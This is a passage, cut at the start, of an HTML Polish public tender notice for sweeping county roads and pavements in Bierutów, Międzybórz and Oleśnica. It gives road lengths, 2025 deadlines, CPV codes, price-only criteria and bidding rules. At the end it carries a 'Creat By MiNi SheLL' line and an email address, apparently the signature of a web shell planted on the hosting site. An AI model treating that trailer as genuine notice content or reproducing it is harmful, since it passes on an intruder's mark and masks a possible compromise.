jezdnia 2000 mb + chodnik 1820mb<br/>- droga powiatowa nr 1460D ul. Żeromskiego – jezdnia 1000 mb + chodnik 960mb.<br/><br/>Dodatkowe odcinki dróg do zamiatania nr 1 na terenie gminy Bierutów:<br/>- droga powiatowa nr 1459D m. Posadowice, m. Sątok - jezdnia 380 mb + chodnik 1500 mb<br/>- droga powiatowa nr 1536D m. Karwiniec - jezdnia 50 mb + chodnik 50 mb<br/>- droga powiatowa nr 1461D m. Kijowice, m. Kruszowice - jezdnia 90 mb + chodnik 90 mb<br/>- droga powiatowa nr 1467D m. Zawidowice - jezdnia 1200 mb + chodnik 1250 mb<br/>- droga powiatowa nr 1463D m. Strzałkowa, m. Solniki Małe - jezdnia 270 mb + chodnik 530 mb<br/>- droga powiatowa nr 1460D m. Wabienice - jezdnia 1360 mb + chodnik 1000 mb<br/>- droga powiatowa nr 1465D m. Jemielna - jezdnia 200 mb + chodnik 230 mb<br/>Razem:<br/>do zamiatania nr 1: jezdnia 6650 mb + chodnik 7530 mb = 14180 mb<br/>do zamiatania nr 2,3,4: jezdnia 3100 mb<br/>2. ZAKRES PRAC DLA ZADANIA 4 oraz termin realizacji<br/>Zadanie nr 4 obejmuje :<br/>Zamiatanie nr 1: <br/>a)	zamiatanie ręczne lub mechaniczne chodników, ścieżek rowerowych lub pieszo-rowerowych na całej szerokości chodnika, ścieżki rowerowej lub pieszo-rowerowej wraz z usunięciem ziemi i darniny.<br/>b) zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>c)	Termin wykonania zamiatania: od dnia podpisania umowy do dnia 30 kwietnia 2025r., odcinki dodatkowe do dnia 30 czerwca 2025r. <br/><br/>Zamiatania nr 2,3, 4:<br/>a)	zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>b)	Terminy wykonania zamiatania:<br/>Zamiatanie nr 2 - do 30 czerwca 2025r. <br/>Zamiatanie nr 3 - do 31 sierpnia 2025r. <br/>Zamiatanie nr 4 - do 31 października 2025r. <br/>3. Utylizacja piasku, ziemi, trawy powstałej w wyniku zamiatania ulic, chodników i ścieżek rowerowych po stronie Wykonawcy.<br/>4. Przedmiot zamówienia, zakres usługi oraz obowiązki Wykonawcy szczegółowo opisane są w:<br/>1) SWZ;<br/>2) projekcie umowy (załącznik nr 1 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 5 – drogi powiatowe na terenie miasta i gminy Międzybórz:<br/>Zamiatanie dróg na terenie m. Międzybórz, w poniższych lokalizacjach:<br/>- droga powiatowa nr 1495D ul. Sycowska – jezdnia 1065 mb + chodnik 1065D<br/>- droga powiatowa nr 1492D ul. Polna – jezdnia 680 mb + chodnik 680 mb<br/>- droga powiatowa nr 1488D ul. Rynek – jezdnia 420 mb + chodnik 420 mb<br/>- droga powiatowa nr 1488D ul. Kolejowa – jezdnia 1875 mb + chodnik 1875 mb<br/>- droga powiatowa nr 1508D ul. Graniczna – jezdnia 200 mb + chodnik 430 mb<br/><br/>Dodatkowe odcinki dróg do zamiatania nr 1 gmina Międzybórz:<br/>- droga powiatowa nr 1495D Kraszów – jezdnia 1075 mb + chodnik 1075 mb<br/>- droga powiatowa nr 1490D Dziesławice – jezdnia 520 mb + chodnik 520 mb<br/>- droga powiatowa nr 1490D Bukowina Sycowska – jezdnia 1505 mb + chodnik 1505 mb<br/>- droga powiatowa nr 1490D Królewska Wola – jezdnia 750 mb + chodnik 750 mb<br/>Razem: <br/>do zamiatania nr 1 - jezdnia 8090 mb + chodnik 8320 mb = 16 410 mb<br/>do zamiatania nr 2, 3, 4: - jezdnia 4240 mb<br/>2. ZAKRES PRAC DLA ZADANIA 5 oraz termin realizacji<br/>Zadanie nr 5 obejmuje :<br/>Zamiatanie nr 1: <br/>a)	zamiatanie ręczne lub mechaniczne chodników, ścieżek rowerowych lub pieszo-rowerowych na całej szerokości chodnika, ścieżki rowerowej lub pieszo-rowerowej wraz z usunięciem ziemi i darniny.<br/>b) zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>c)	Termin wykonania zamiatania: od dnia podpisania umowy do dnia 30 kwietnia 2025r., odcinki dodatkowe do dnia 30 czerwca 2025r. <br/><br/>Zamiatania nr 2,3, 4:<br/>a)	zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>b)	Terminy wykonania zamiatania:<br/>Zamiatanie nr 2 - do 30 czerwca 2025r. <br/>Zamiatanie nr 3 - do 31 sierpnia 2025r. <br/>Zamiatanie nr 4 - do 31 października 2025r. <br/>3. Utylizacja piasku, ziemi, trawy powstałej w wyniku zamiatania ulic, chodników i ścieżek rowerowych po stronie Wykonawcy.<br/>4. Przedmiot zamówienia, zakres usługi oraz obowiązki Wykonawcy szczegółowo opisane są w:<br/>1) SWZ;<br/>2) projekcie umowy (załącznik nr 1 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 6: drogi powiatowe na terenie gminy Oleśnica:<br/>Zamiatanie jezdni, chodników i ścieżek rowerowych na terenie gminy Oleśnica w poniższych lokalizacjach:<br/>- Spalice ul. Warszawska – jezdnia 2000 mb, ścieżka rowerowa, chodniki – 2000mb<br/>- droga powiatowa nr 1920D m. Piszkawa, m. Bystre ul. Wrocławska - jezdnia 800 mb + chodnik 900 mb<br/>- Bystre ul. Ludwikowska (od ul. Słonecznikowej do ul. Tulipanowej) – jezdnia 350 mb, chodnik 350 mb<br/>- droga powiatowa nr 1466D m. Ligota Mała, m. Ligota Wielka - jezdnia 3520 mb + chodnik 4160 mb<br/>- droga powiatowa nr 1467D m. Ligota Wielka, m. Smolna - jezdnia 1390 mb + chodnik 3120 mb<br/>- droga powiatowa nr 1469D m. Cieśle, m. Wyszogród, m. Nowoszyce, m. Gręboszyce - jezdnia 1270 mb + chodnik 1955 mb<br/>- droga powiatowa nr 3502D m. Cieśle, m. Poniatowice, m. Ligota Polska - jezdnia 2000 mb + chodnik 2000 mb<br/>- droga powiatowa nr 1465D m. Poniatowice, m. Ligota Polska - jezdnia 4770 mb + chodnik 2870 mb<br/>- droga powiatowa nr 1477D m. Brzezinka - jezdnia 1200 mb + chodnik 1200 mb<br/>- droga powiatowa nr 1473D m. Spalice, m. Boguszyce - jezdnia 1940 mb + chodnik 1810 mb<br/>- droga powiatowa nr 3501D DKS8 – Smardzów – granica powiatu - jezdnia 7950 mb + chodnik 3100mb<br/>Razem:<br/>do zamiatania nr 1: jezdnia 27190 mb + chodnik, ścieżka rowerowa 23465 mb = 50655 mb<br/>2. ZAKRES PRAC DLA ZADANIA 6 oraz termin realizacji<br/>Zadanie nr 6 obejmuje:<br/>a)	jednokrotne zamiatanie ręczne lub mechaniczne chodników, ścieżek rowerowych na całej szerokości chodnika lub ścieżki rowerowej wraz z usunięciem ziemi i darniny.<br/>b)	zamiatanie ręczne lub mechaniczne ulic na szerokości 1m przy chodnikach, krawężnikach, ściekach korytkowych, wysepkach zlokalizowanych w osi jezdni na rondach, przejściach dla pieszych, martwych polach wyłączonych z ruchu zlokalizowanych w osi jezdni, oraz zatokach autobusowych, postojowych przylegających bezpośrednio do krawędzi jezdni na całej ich powierzchni. <br/>c)	Termin wykonania do 30 czerwca 2025r.<br/>3. Utylizacja piasku, ziemi, trawy powstałej w wyniku zamiatania ulic, chodników i ścieżek rowerowych po stronie Wykonawcy.<br/>4. Przedmiot zamówienia, zakres usługi oraz obowiązki Wykonawcy szczegółowo opisane są w:<br/>1) SWZ;<br/>2) projekcie umowy (załącznik nr 1 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Rozdz. IX ust. 1 SWZ, składa każdy z Wykonawców.<br/>4. Oświadczenie potwierdzające brak podstaw do wykluczenia z postępowania, składa każdy z Wykonawców wspólnie ubiegający się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym w projekcie umowy, stanowiącym Załącznik nr 1 do SWZ.<br/>2.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1076428</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę, wobec którego zachodzi którakolwiek z okoliczności, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, tj.: <br/>1)	wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2)	wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023.1124) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3)	wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023.120), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com